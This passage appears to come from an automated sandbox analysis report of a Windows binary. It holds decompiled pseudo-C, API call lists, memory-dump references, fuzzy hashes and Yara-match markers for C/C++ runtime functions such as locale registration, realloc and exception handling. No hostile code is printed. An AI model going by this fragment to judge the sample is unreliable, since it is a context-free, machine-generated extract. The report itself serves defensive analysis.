                                                                                      0x00402bda
                                                                                      0x00402be2
                                                                                      0x00402be5
                                                                                      0x00402beb
                                                                                      0x00402c16
                                                                                      0x00402c16
                                                                                      0x00402c1c
                                                                                      0x00402c21
                                                                                      0x00402c2b
                                                                                      0x00402c23
                                                                                      0x00402c26
                                                                                      0x00402c26
                                                                                      0x00402c2f
                                                                                      0x00402c4c
                                                                                      0x00402c36
                                                                                      0x00402c36
                                                                                      0x00402c3e
                                                                                      0x00402c48
                                                                                      0x00402c40
                                                                                      0x00402c43
                                                                                      0x00402c43
                                                                                      0x00402c3e
                                                                                      0x00402c50
                                                                                      0x00402c52
                                                                                      0x00402c57
                                                                                      0x00402c59
                                                                                      0x00402c66
                                                                                      0x00402c70
                                                                                      0x00402c7e
                                                                                      0x00402c7e
                                                                                      0x00402c83
                                                                                      0x00402c88
                                                                                      0x00402c8e
                                                                                      0x00402c94
                                                                                      0x00402c99
                                                                                      0x00402c57
                                                                                      0x00402c9a
                                                                                      0x00402ca1
                                                                                      0x00402cae
                                                                                      0x00402cb6
                                                                                      0x00402cb6
                                                                                      0x00402bf1
                                                                                      0x00402bf6
                                                                                      0x00402bfc
                                                                                      0x00402bfe
                                                                                      0x00402c04
                                                                                      0x00402c09
                                                                                      0x00402c09
                                                                                      0x00402c11
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00402BC2
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00402BD5
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00402BF1
                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 00402C70
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00402C7E
                                                                                      • std::locale::facet::_Incref.LIBCPMT ref: 00402C8E
                                                                                      • std::locale::facet::facet_Register.LIBCPMT ref: 00402C94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: LockitLockit::_std::_$Exception@8H_prologIncrefRegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_std::locale::facet::facet_
                                                                                      • String ID: bad cast
                                                                                      • API String ID: 1536243051-3145022300
                                                                                      • Opcode ID: 227b96fff5f8588e0cf2f675bde784d4bea22e7613f21d31d4d0d397b2153332
                                                                                      • Instruction ID: ab39d80ecd0844aabfef37ee2d8a10b68e059950bc7d2041521cb76376169d08
                                                                                      • Opcode Fuzzy Hash: 227b96fff5f8588e0cf2f675bde784d4bea22e7613f21d31d4d0d397b2153332
                                                                                      • Instruction Fuzzy Hash: 7F3103719001209FCB14EFA4DA858AEBB74BB25324B15057FE812772F1DB786E46CB5C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404D22, Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 97%
                                                                                      			E00404D22(void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t13;
				void* _t19;
				void* _t22;
				signed int _t27;
				intOrPtr _t42;
				void* _t44;
				intOrPtr* _t46;

				_t42 = E00408A15( *0x4b94d0);
				_v8 = _t42;
				_t46 = E00408A15( *0x4b94cc);
				if(_t46 < _t42) {
					L11:
					_t13 = 0;
					__eflags = 0;
				} else {
					_t27 = _t46 - _t42;
					_t2 = _t27 + 4; // 0x4
					_t50 = _t2 - 4;
					if(_t2 < 4) {
						goto L11;
					} else {
						_push(_t42);
						_t44 = E0040B816(_t27, __edx, _t42, _t46, _t50);
						_t3 = _t27 + 4; // 0x4
						if(_t44 >= _t3) {
							L10:
							 *_t46 = E0040899A(_a4);
							 *0x4b94cc = E0040899A(_t46 + 4);
							_t13 = _a4;
						} else {
							_t19 = 0x800;
							if(_t44 < 0x800) {
								_t19 = _t44;
							}
							_t20 = _t19 + _t44;
							if(_t19 + _t44 < _t44) {
								L7:
								_t5 = _t44 + 0x10; // 0x10
								_t21 = _t5;
								if(_t5 < _t44) {
									goto L11;
								} else {
									_t22 = E0040678A(_v8, _t21);
									if(_t22 == 0) {
										goto L11;
									} else {
										goto L9;
									}
								}
							} else {
								_t22 = E0040678A(_v8, _t20);
								if(_t22 != 0) {
									L9:
									_t46 = _t22 + (_t27 >> 2) * 4;
									 *0x4b94d0 = E0040899A(_t22);
									goto L10;
								} else {
									goto L7;
								}
							}
						}
					}
				}
				return _t13;
			}















                                                                                      0x00404d3c
                                                                                      0x00404d3e
                                                                                      0x00404d46
                                                                                      0x00404d4c
                                                                                      0x00404dd5
                                                                                      0x00404dd5
                                                                                      0x00404dd5
                                                                                      0x00404d52
                                                                                      0x00404d54
                                                                                      0x00404d56
                                                                                      0x00404d59
                                                                                      0x00404d5c
                                                                                      0x00000000
                                                                                      0x00404d5e
                                                                                      0x00404d5e
                                                                                      0x00404d64
                                                                                      0x00404d66
                                                                                      0x00404d6c
                                                                                      0x00404db6
                                                                                      0x00404dbe
                                                                                      0x00404dca
                                                                                      0x00404dcf
                                                                                      0x00404d6e
                                                                                      0x00404d6e
                                                                                      0x00404d75
                                                                                      0x00404d77
                                                                                      0x00404d77
                                                                                      0x00404d79
                                                                                      0x00404d7d
                                                                                      0x00404d8e
                                                                                      0x00404d8e
                                                                                      0x00404d8e
                                                                                      0x00404d93
                                                                                      0x00000000
                                                                                      0x00404d95
                                                                                      0x00404d99
                                                                                      0x00404da2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404da2
                                                                                      0x00404d7f
                                                                                      0x00404d83
                                                                                      0x00404d8c
                                                                                      0x00404da4
                                                                                      0x00404da8
                                                                                      0x00404db1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404d8c
                                                                                      0x00404d7d
                                                                                      0x00404d6c
                                                                                      0x00404d5c
                                                                                      0x00404ddb

                                                                                      APIs
                                                                                      • __decode_pointer.LIBCMT ref: 00404D31
                                                                                        • Part of subcall function 00408A15: TlsGetValue.KERNEL32(00000000,?,00408AB0), ref: 00408A27
                                                                                        • Part of subcall function 00408A15: TlsGetValue.KERNEL32(00000001,?,00408AB0), ref: 00408A3E
                                                                                      • __decode_pointer.LIBCMT ref: 00404D41
                                                                                        • Part of subcall function 00408A15: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00408AB0), ref: 00408A54
                                                                                        • Part of subcall function 00408A15: __crt_waiting_on_module_handle.LIBCMT ref: 00408A5F
                                                                                        • Part of subcall function 00408A15: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00408A6F
                                                                                      • __msize.LIBCMT ref: 00404D5F
                                                                                      • __realloc_crt.LIBCMT ref: 00404D83
                                                                                      • __realloc_crt.LIBCMT ref: 00404D99
                                                                                      • __encode_pointer.LIBCMT ref: 00404DAB
                                                                                      • __encode_pointer.LIBCMT ref: 00404DB9
                                                                                      • __encode_pointer.LIBCMT ref: 00404DC4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: __encode_pointer$Value__decode_pointer__realloc_crt$AddressHandleModuleProc__crt_waiting_on_module_handle__msize
                                                                                      • String ID:
                                                                                      • API String ID: 2836500094-0
                                                                                      • Opcode ID: 9fd23f137018e5086ea670d3691d770b197e2dda82e7aedc22f322629f147f2f
                                                                                      • Instruction ID: ee0d79a7a5e188716b9310d7c5dbe2c3378bc894bca3bf637bddfd72b35f001b
                                                                                      • Opcode Fuzzy Hash: 9fd23f137018e5086ea670d3691d770b197e2dda82e7aedc22f322629f147f2f
                                                                                      • Instruction Fuzzy Hash: 4B11D6B2604115AFDB01AB29ED818AA37EAEEC1368324453FE649F71D0FF39DC51464C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 009066D9, Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __getptd_noexit.LIBCMT ref: 009066DD
                                                                                        • Part of subcall function 008659BF: __calloc_crt.LIBCMT ref: 008659E2
                                                                                        • Part of subcall function 008659BF: __initptd.LIBCMT ref: 00865A04
                                                                                      • __calloc_crt.LIBCMT ref: 00906700
                                                                                      • __get_sys_err_msg.LIBCMT ref: 0090671E
                                                                                      • __invoke_watson.LIBCMT ref: 0090673B
                                                                                      • __get_sys_err_msg.LIBCMT ref: 0090676D
                                                                                      • __invoke_watson.LIBCMT ref: 0090678B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                      • String ID:
                                                                                      • API String ID: 4066021419-0
                                                                                      • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                      • Instruction ID: ecbf033b0239f4899a02fc7a13e4caf1014e5fe77cd67d29d06933ba412f6632
                                                                                      • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                      • Instruction Fuzzy Hash: 0511C4326017146FEB21762DDC02ABF738CEF40764F110426FD48DA282E732DD2042D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040BC19, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 90%
                                                                                      			E0040BC19(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x4ab8a8);
				E004080B0(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00405141(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00408C61(__ecx, __edx, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00408C61(_t48, __edx, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E00408C61(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E00408C61(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E004051E6(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E0040BD3F(_t48, _t53, _t55, _t57, _t61);
				return E004080F5( *((intOrPtr*)(_t58 - 0x1c)));
			}







                                                                                      0x0040bc19
                                                                                      0x0040bc19
                                                                                      0x0040bc19
                                                                                      0x0040bc1b
                                                                                      0x0040bc20
                                                                                      0x0040bc25
                                                                                      0x0040bc27
                                                                                      0x0040bc2a
                                                                                      0x0040bc2d
                                                                                      0x0040bc30
                                                                                      0x0040bc37
                                                                                      0x0040bc48
                                                                                      0x0040bc56
                                                                                      0x0040bc64
                                                                                      0x0040bc6c
                                                                                      0x0040bc7a
                                                                                      0x0040bc80
                                                                                      0x0040bc87
                                                                                      0x0040bc8a
                                                                                      0x0040bca0
                                                                                      0x0040bca3
                                                                                      0x0040bd18
                                                                                      0x0040bd1f
                                                                                      0x0040bd26
                                                                                      0x0040bd33

                                                                                      APIs
                                                                                      • __CreateFrameInfo.LIBCMT ref: 0040BC41
                                                                                        • Part of subcall function 00405141: __getptd.LIBCMT ref: 0040514F
                                                                                        • Part of subcall function 00405141: __getptd.LIBCMT ref: 0040515D
                                                                                      • __getptd.LIBCMT ref: 0040BC4B
                                                                                        • Part of subcall function 00408C61: __getptd_noexit.LIBCMT ref: 00408C64
                                                                                        • Part of subcall function 00408C61: __amsg_exit.LIBCMT ref: 00408C71
                                                                                      • __getptd.LIBCMT ref: 0040BC59
                                                                                      • __getptd.LIBCMT ref: 0040BC67
                                                                                      • __getptd.LIBCMT ref: 0040BC72
                                                                                      • _CallCatchBlock2.LIBCMT ref: 0040BC98
                                                                                        • Part of subcall function 004051E6: __CallSettingFrame@12.LIBCMT ref: 00405232
                                                                                        • Part of subcall function 0040BD3F: __getptd.LIBCMT ref: 0040BD4E
                                                                                        • Part of subcall function 0040BD3F: __getptd.LIBCMT ref: 0040BD5C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                      • String ID:
                                                                                      • API String ID: 1602911419-0
                                                                                      • Opcode ID: 86b47c6857254feccd88310b567089e0ead91099dc9c1b65870741aea1de490e
                                                                                      • Instruction ID: 0debe1b14ca3a735202e724f585256bbada5f7403a25a02b8e95732e92b8ad28
                                                                                      • Opcode Fuzzy Hash: 86b47c6857254feccd88310b567089e0ead91099dc9c1b65870741aea1de490e
                                                                                      • Instruction Fuzzy Hash: 6011F971C002099FDB00EFA5C985B9EBBB0FF04315F14807EF854A7292DB389A159F68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401689, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 43%
                                                                                      			E00401689() {
				signed char _t23;
				void* _t28;
				void* _t34;
				void* _t38;

				E004A6CC8(E004A6F20, _t38);
				_t23 =  *(_t34 + 0xc) &  *(_t34 + 8);
				if((_t23 & 0x00000004) == 0) {
					L4:
					_t40 = _t23 & 0x00000002;
					if((_t23 & 0x00000002) == 0) {
						E00401CD9(_t38 - 0x70, "ios_base::eofbit set");
						_push(_t38 - 0x70);
						_push(_t38 - 0x98);
						 *(_t38 - 4) = 2;
						E0040163D(__eflags);
						_push(0x4abb90);
						_t28 = _t38 - 0x98;
						L3:
						_push(_t28);
						_t23 = E004052D2();
						goto L4;
					}
					E00401CD9(_t38 - 0x2c, "ios_base::failbit set");
					 *(_t38 - 4) = 1;
					L2:
					_push(_t38 - 0x2c);
					_push(_t38 - 0x54);
					E0040163D(_t40);
					_push(0x4abb90);
					_t28 = _t38 - 0x54;
					goto L3;
				}
				E00401CD9(_t38 - 0x2c, "ios_base::badbit set");
				_t6 = _t38 - 4;
				 *_t6 =  *(_t38 - 4) & 0x00000000;
				_t40 =  *_t6;
				goto L2;
			}







                                                                                      0x0040168e
                                                                                      0x00401696
                                                                                      0x004016a1
                                                                                      0x004016cf
                                                                                      0x004016cf
                                                                                      0x004016d1
                                                                                      0x004016f1
                                                                                      0x004016f9
                                                                                      0x00401700
                                                                                      0x00401701
                                                                                      0x00401708
                                                                                      0x0040170d
                                                                                      0x00401712
                                                                                      0x004016c9
                                                                                      0x004016c9
                                                                                      0x004016ca
                                                                                      0x00000000
                                                                                      0x004016ca
                                                                                      0x004016db
                                                                                      0x004016e0
                                                                                      0x004016b4
                                                                                      0x004016b7
                                                                                      0x004016bb
                                                                                      0x004016bc
                                                                                      0x004016c1
                                                                                      0x004016c6
                                                                                      0x00000000
                                                                                      0x004016c6
                                                                                      0x004016ab
                                                                                      0x004016b0
                                                                                      0x004016b0
                                                                                      0x004016b0
                                                                                      0x00000000

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Exception@8H_prologThrow
                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                      • API String ID: 3222999186-1866435925
                                                                                      • Opcode ID: 87d3203da5ccdc872c2b7ff9653e6d2ee29615d5a3bf8c40d1c561cd24c06900
                                                                                      • Instruction ID: a80709d98f64061725cf21bd3e7cc156939d23d4beb78a6d76d1c6feba328024
                                                                                      • Opcode Fuzzy Hash: 87d3203da5ccdc872c2b7ff9653e6d2ee29615d5a3bf8c40d1c561cd24c06900
                                                                                      • Instruction Fuzzy Hash: 0E0112718501089AD700EBE5CC46FDD737CAF15308F64846BE006761A6DB7E9A099B28
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040B968, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 73%
                                                                                      			E0040B968(void* __edx, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;
				void* _t25;

				_t24 = __edx;
				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E00408C61(_t23, __edx, _t25, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E00408C61(_t23, __edx, _t25, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E00408C61(_t23, __edx, _t25, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x4ab948);
						E004080B0(_t23, _t25, __esi);
						_t19 =  *((intOrPtr*)(E00408C61(_t23, __edx, _t25, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E004080F5(E00404C0B(_t23, _t24, _t25));
					}
				}
			}









                                                                                      0x0040b968
                                                                                      0x0040b972
                                                                                      0x0040b979
                                                                                      0x0040b998
                                                                                      0x0040b99f
                                                                                      0x0040b9a6
                                                                                      0x0040b9ab
                                                                                      0x0040b9ab
                                                                                      0x0040b9ab
                                                                                      0x00000000
                                                                                      0x0040b97b
                                                                                      0x0040b97b
                                                                                      0x0040b980
                                                                                      0x0040b9ad
                                                                                      0x0040b9ad
                                                                                      0x0040b9b0
                                                                                      0x0040b982
                                                                                      0x0040b987
                                                                                      0x0040c572
                                                                                      0x0040c574
                                                                                      0x0040c579
                                                                                      0x0040c583
                                                                                      0x0040c588
                                                                                      0x0040c58a
                                                                                      0x0040c58e
                                                                                      0x0040c599
                                                                                      0x0040c599
                                                                                      0x0040c5aa
                                                                                      0x0040c5aa
                                                                                      0x0040b980

                                                                                      APIs
                                                                                      • __getptd.LIBCMT ref: 0040B982
                                                                                        • Part of subcall function 00408C61: __getptd_noexit.LIBCMT ref: 00408C64
                                                                                        • Part of subcall function 00408C61: __amsg_exit.LIBCMT ref: 00408C71
                                                                                      • __getptd.LIBCMT ref: 0040B993
                                                                                      • __getptd.LIBCMT ref: 0040B9A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                      • String ID: MOC$csm
                                                                                      • API String ID: 803148776-1389381023
                                                                                      • Opcode ID: bfa9a103a35016602e4115c8ddd52ff22a37d0e9f9d7e3ae51fd8bde65f33129
                                                                                      • Instruction ID: d834f262890598c472e4d9ba4fd5a43c961720595d1b26673d2cfce027734a2a
                                                                                      • Opcode Fuzzy Hash: bfa9a103a35016602e4115c8ddd52ff22a37d0e9f9d7e3ae51fd8bde65f33129
                                                                                      • Instruction Fuzzy Hash: 2FE04F75504204CFD710AB79C58AB2933A4EF49319F2901BBE58CD73A2DB3CE850A59F
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00862AD0, Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                      • String ID:
                                                                                      • API String ID: 1559183368-0
                                                                                      • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                      • Instruction ID: 2d3e01d75bf362032bd9832fca257f685710968eae8996b615a035281c416a28
                                                                                      • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                      • Instruction Fuzzy Hash: 7651C330A00B0ADBDB259F69888066E77B5FF40334F2687A9F835D62D0DB749D50DB41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409DCB, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 89%
                                                                                      			E00409DCB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x4ab768);
				E004080B0(__ebx, __edi, __esi);
				_t31 = E00408C61(__ebx, __edx, __edi, _t35);
				_t15 =  *0x4adc98; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E004075B9(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x4adba0; // 0x7917d8
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x4ad778;
								if(__eflags != 0) {
									_push(_t33);
									E00403B26(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x4adba0; // 0x7917d8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x4adba0; // 0x7917d8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00409E66();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E004083EA(_t29, _t31, 0x20);
				}
				return E004080F5(_t33);
			}










                                                                                      0x00409dcb
                                                                                      0x00409dcb
                                                                                      0x00409dcb
                                                                                      0x00409dcb
                                                                                      0x00409dcd
                                                                                      0x00409dd2
                                                                                      0x00409ddc
                                                                                      0x00409dde
                                                                                      0x00409de6
                                                                                      0x00409e07
                                                                                      0x00409e0d
                                                                                      0x00409e11
                                                                                      0x00409e14
                                                                                      0x00409e17
                                                                                      0x00409e1d
                                                                                      0x00409e1f
                                                                                      0x00409e21
                                                                                      0x00409e24
                                                                                      0x00409e2a
                                                                                      0x00409e2c
                                                                                      0x00409e2e
                                                                                      0x00409e34
                                                                                      0x00409e36
                                                                                      0x00409e37
                                                                                      0x00409e3c
                                                                                      0x00409e34
                                                                                      0x00409e2c
                                                                                      0x00409e3d
                                                                                      0x00409e42
                                                                                      0x00409e45
                                                                                      0x00409e4b
                                                                                      0x00409e4f
                                                                                      0x00409e4f
                                                                                      0x00409e55
                                                                                      0x00409e5c
                                                                                      0x00409dee
                                                                                      0x00409dee
                                                                                      0x00409dee
                                                                                      0x00409df3
                                                                                      0x00409df7
                                                                                      0x00409dfc
                                                                                      0x00409e04

                                                                                      APIs
                                                                                      • __getptd.LIBCMT ref: 00409DD7
                                                                                        • Part of subcall function 00408C61: __getptd_noexit.LIBCMT ref: 00408C64
                                                                                        • Part of subcall function 00408C61: __amsg_exit.LIBCMT ref: 00408C71
                                                                                      • __amsg_exit.LIBCMT ref: 00409DF7
                                                                                      • __lock.LIBCMT ref: 00409E07
                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00409E24
                                                                                      • InterlockedIncrement.KERNEL32(007917D8), ref: 00409E4F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                      • String ID:
                                                                                      • API String ID: 4271482742-0
                                                                                      • Opcode ID: b5713b4f30f0c924c1af7cf02b884a3a08681e88c898df7691b1bf86249d423f
                                                                                      • Instruction ID: 780197a80d9c4ec97f989673480b3a6a1a38f0117634969727c0026079deb8f3
                                                                                      • Opcode Fuzzy Hash: b5713b4f30f0c924c1af7cf02b884a3a08681e88c898df7691b1bf86249d423f
                                                                                      • Instruction Fuzzy Hash: A7017C32D04611EBC721AB26D84575A7B60AF01B14F46403BE804736D2CB3C6D41DAED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403B26, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 41%
